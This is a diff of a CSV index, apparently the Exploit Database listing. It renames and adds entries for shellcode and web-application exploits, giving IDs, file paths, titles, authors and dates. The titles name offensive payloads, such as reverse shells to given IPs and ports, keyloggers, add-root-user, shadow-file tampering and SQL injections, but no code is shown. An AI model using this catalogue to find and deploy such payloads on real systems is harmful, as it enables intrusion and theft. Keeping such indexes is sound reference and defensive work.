+17326,platforms/windows/shellcode/17326.rb,"Windows - Reverse Download and Execute via DNS (IPv6) Shellcode (Metasploit)",2011-05-26,"Alexey Sintsov",windows,shellcode,0
 17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0
 17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0
 17545,platforms/win_x86/shellcode/17545.txt,"Win32/PerfectXp-pc1/SP3 (TR) - Add Administrator 'kpss' Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0
@@ -16199,7 +16206,7 @@ id,file,description,date,author,platform,type,port
 18585,platforms/lin_x86-64/shellcode/18585.s,"Linux/x86-64 - Add User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode,0
 18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0
 20196,platforms/lin_x86/shellcode/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0
-21252,platforms/arm/shellcode/21252.asm,"Linux/ARM (Raspberry Pi) - reverse_shell (tcp_10.1.1.2_0x1337) Shellcode (72 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
+21252,platforms/arm/shellcode/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
 21253,platforms/arm/shellcode/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
 21254,platforms/arm/shellcode/21254.asm,"Linux/ARM (Raspberry Pi) - chmod(_/etc/shadow__ 0777) Shellcode (41 bytes)",2012-09-11,midnitesnake,arm,shellcode,0
 40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Bind TCP Password Protected Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
@@ -16207,13 +16214,13 @@ id,file,description,date,author,platform,type,port
 40890,platforms/win_x86-64/shellcode/40890.c,"Windows x64 - Bind Shell TCP Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0
 24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0
-25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP (192.168.1.10:31337) Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0
+25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0
 40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0
 27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0
 27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell 4444/TCP Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0
 40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egghunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0
 28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter Shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0
-40334,platforms/win_x86/shellcode/40334.c,"Windows x86 - Reverse Persistent TCP Shellcode (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
+40334,platforms/win_x86/shellcode/40334.c,"Windows x86 - Reverse TCP Persistent Shell (192.168.232.129:4444/TCP) Shellcode (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 28996,platforms/windows/shellcode/28996.c,"Windows - Messagebox Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",windows,shellcode,0
 29436,platforms/linux_mips/shellcode/29436.asm,"Linux/MIPS (Little Endian) - Reverse Shell (192.168.1.177:31337) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",linux_mips,shellcode,0
 40352,platforms/win_x86/shellcode/40352.c,"Windows 7 x86 - Bind Shell 4444/TCP Shellcode (357 Bytes)",2016-09-08,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
@@ -16293,15 +16300,15 @@ id,file,description,date,author,platform,type,port
 39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
 39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bind 4444/TCP Password Prompt Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0
 39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve _/bin/sh_ Shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
-39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - Reverse TCP Password Prompt Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0
+39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - Reverse TCP Password Prompt Shell (127.0.0.1:4444) Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0
 39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0
 39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
 39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - execve (xor/not/div Encoded) Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
-39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
+39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
 39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
 39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
-39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
+39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - Reverse TCP Password Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
-39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (2) (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
+39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - Reverse TCP Password Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (2) (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
 39389,platforms/lin_x86/shellcode/39389.c,"Linux/x86 - Download + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode,0
 39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - Execve-Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
 39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh Shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0
@@ -16314,16 +16321,16 @@ id,file,description,date,author,platform,type,port
 39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0
 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - Bind 5600/TCP Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
 40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() / SetFileAttributesA() / WinExec() / ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
-39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP Shellcode (IPv6) (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
+39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP (IPv6) Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
 39723,platforms/lin_x86/shellcode/39723.c,"Linux/x86 - Bind 1472/TCP (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
 39728,platforms/generator/shellcode/39728.py,"Linux/x86-64 - Bind Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",generator,shellcode,0
 39731,platforms/windows/shellcode/39731.c,"Windows - Primitive Keylogger to File Null-Free Shellcode (431 (0x01AF) bytes)",2016-04-25,Fugu,windows,shellcode,0
 39754,platforms/win_x86/shellcode/39754.txt,"Win32 .Net Framework - Execute Native x86 Shellcode",2016-05-02,Jacky5112,win_x86,shellcode,0
-39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind 1472/TCP Shellcode (IPv6) (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
+39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind 1472/TCP (IPv6) Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
-39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP Shellcode (IPv6) (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
+39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 39794,platforms/windows/shellcode/39794.c,"Windows - Functional Keylogger to File Null-Free Shellcode (601 (0x0259) bytes)",2016-05-10,Fugu,windows,shellcode,0
-39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bind Shell Configurable Port Shellcode (87 bytes)",2016-05-16,JollyFrogs,lin_x86,shellcode,0
+39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bind Shell 1234/TCP (Configurable Port) Shellcode (87 bytes)",2016-05-16,JollyFrogs,lin_x86,shellcode,0
-39844,platforms/lin_x86-64/shellcode/39844.c,"Linux/x86-64 - Reverse TCP Shell Null-Free Shellcode (134 bytes)",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
+39844,platforms/lin_x86-64/shellcode/39844.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
 39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Information Stealer Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
 39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - execve (XOR Encoded) Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
@@ -16338,23 +16345,23 @@ id,file,description,date,author,platform,type,port
 40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind Netcat Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0
 40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0
 40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0
-40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0
+40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP Shell Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0
 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Reverse Continuously Probing Shell via Socket + Port-range + Password Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0
 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0
-40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell / Multi-terminal / Password / Daemon Shellcode (83_ 148_ 177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0
+40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell / Multi-terminal / Password / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0
 40128,platforms/linux_crisv32/shellcode/40128.c,"Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)",2016-07-20,bashis,linux_crisv32,shellcode,0
 40131,platforms/lin_x86/shellcode/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode,0
-40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Subtle Probing Reverse Shell / Timer_ Burst / Password / Multi-Terminal Shellcode (84_ 122_ 172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0
+40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357) / Subtle Probing / Timer / Burst / Password / Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0
 40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
-40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - Bind Netcat with Port Shellcode (44/52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0
+40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - Bind Netcat 98/TCP + UDP Shellcode (44/52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0
 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - Bind zsh 9090/TCP Shellcode (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
-40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - Reverse ZSH 127.255.255.254:9090/TCP Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
+40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - Reverse TCP ZSH (127.255.255.254:9090/TCP) Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
 40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 40549,platforms/win_x86-64/shellcode/40549.c,"Windows x64 - WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
-40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Reverse UDP Keylogger Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0
+40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0
-40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse Shell TCP Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
+40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 40808,platforms/lin_x86-64/shellcode/40808.c,"Linux/x86-64 - /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",lin_x86-64,shellcode,0
 40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download + Execute Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Reverse Netcat (-e option disabled) Shell Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0
@@ -16369,22 +16376,22 @@ id,file,description,date,author,platform,type,port
 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
 41375,platforms/linux/shellcode/41375.c,"Linux - Bind Shell Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
-41398,platforms/lin_x86-64/shellcode/41398.nasm,"Linux/x86-64 - Reverse TCP Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode,0
+41398,platforms/lin_x86-64/shellcode/41398.nasm,"Linux/x86-64 - Reverse TCP Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode,0
 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode,0
 41439,platforms/lin_x86-64/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,lin_x86-64,shellcode,0
 41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,lu0xheap,win_x86,shellcode,0
 41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86-64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
-41477,platforms/lin_x86-64/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",lin_x86-64,shellcode,0
+41477,platforms/lin_x86-64/shellcode/41477.c,"Linux/x86-64 - Reverse TCP Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",lin_x86-64,shellcode,0
-41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
+41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
 41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Setuid(0) + Execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
 41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Flush IPTables Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
-41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - Reverse Netcat Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
+41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - Reverse Netcat (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
 41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Reverse Netcat Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
 41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
 41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - exceve(_/bin/sh_) Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
 41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
 41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - File Reader Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0
-42295,platforms/lin_x86/shellcode/42295.c,"Linux/x86 - Reverse TCP Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",lin_x86,shellcode,0
+42295,platforms/lin_x86/shellcode/42295.c,"Linux/x86 - Reverse TCP Shell Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",lin_x86,shellcode,0
 41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0
 41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0
 41757,platforms/lin_x86/shellcode/41757.txt,"Linux/x86 - execve(_/bin/sh_) Shellcode (21 bytes)",2017-03-29,WangYihang,lin_x86,shellcode,0
@@ -16392,15 +16399,16 @@ id,file,description,date,author,platform,type,port
 41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (31 bytes)",2017-04-13,WangYihang,lin_x86-64,shellcode,0
 41909,platforms/lin_x86/shellcode/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,lin_x86,shellcode,0
 41969,platforms/lin_x86/shellcode/41969.c,"Linux/x86 - Disable ASLR Shellcode (80 bytes)",2017-05-08,abatchy17,lin_x86,shellcode,0
-41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0
+41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) Shellcode (IPv6) (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0
 42016,platforms/windows/shellcode/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",windows,shellcode,0
 42126,platforms/lin_x86-64/shellcode/42126.c,"Linux/x86-64 - /bin/sh Shellcode (31 bytes)",2017-06-05,"Touhid M.Shaikh",lin_x86-64,shellcode,0
 42177,platforms/lin_x86/shellcode/42177.c,"Linux/x86 - execve(/bin/sh) setuid(0) setgid(0) (XOR Encoded) Shellcode (66 bytes)",2017-06-15,nullparasite,lin_x86,shellcode,0
-42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86_64 - execve(_/bin/sh_) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0
+42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0
-42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0
+42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0
-42254,platforms/lin_x86/shellcode/42254.c,"Linux/x86 - Bind Shell Shellcode (75 bytes)",2017-06-26,wetw0rk,lin_x86,shellcode,0
+42254,platforms/lin_x86/shellcode/42254.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (75 bytes)",2017-06-26,wetw0rk,lin_x86,shellcode,0
-42339,platforms/lin_x86-64/shellcode/42339.c,"Linux/x86_64 - Reverse Shell (192.168.1.8:4444) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,lin_x86-64,shellcode,0
+42339,platforms/lin_x86-64/shellcode/42339.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,lin_x86-64,shellcode,0
 42428,platforms/lin_x86/shellcode/42428.c,"Linux x86 - /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",lin_x86,shellcode,0
+42485,platforms/lin_x86-64/shellcode/42485.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",lin_x86-64,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37740,7 +37748,7 @@ id,file,description,date,author,platform,type,port
 41283,platforms/php/webapps/41283.txt,"Mobiketa 3.5 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
 41284,platforms/php/webapps/41284.txt,"Sendroid 5.2 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
 41285,platforms/php/webapps/41285.txt,"Fome SMS Portal 2.0 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
-41286,platforms/php/webapps/41286.txt,"SOA School Management - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
+41286,platforms/php/webapps/41286.txt,"SOA School Management - 'view' Parameter SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
 41287,platforms/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
 41288,platforms/php/webapps/41288.txt,"EXAMPLO - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
 41290,platforms/php/webapps/41290.txt,"CMS Lite 1.3.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
@@ -38166,6 +38174,7 @@ id,file,description,date,author,platform,type,port
 42105,platforms/multiple/webapps/42105.html,"WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
 42106,platforms/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
 42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
+42111,platforms/json/webapps/42111.txt,"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection",2017-06-02,"Goran Tuzovic",json,webapps,0
 42113,platforms/php/webapps/42113.txt,"Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection",2017-06-03,"Persian Hack Team",php,webapps,0
 42114,platforms/hardware/webapps/42114.py,"EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution",2017-06-04,LiquidWorm,hardware,webapps,0
 42117,platforms/windows/webapps/42117.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0
@@ -38280,3 +38289,21 @@ id,file,description,date,author,platform,type,port
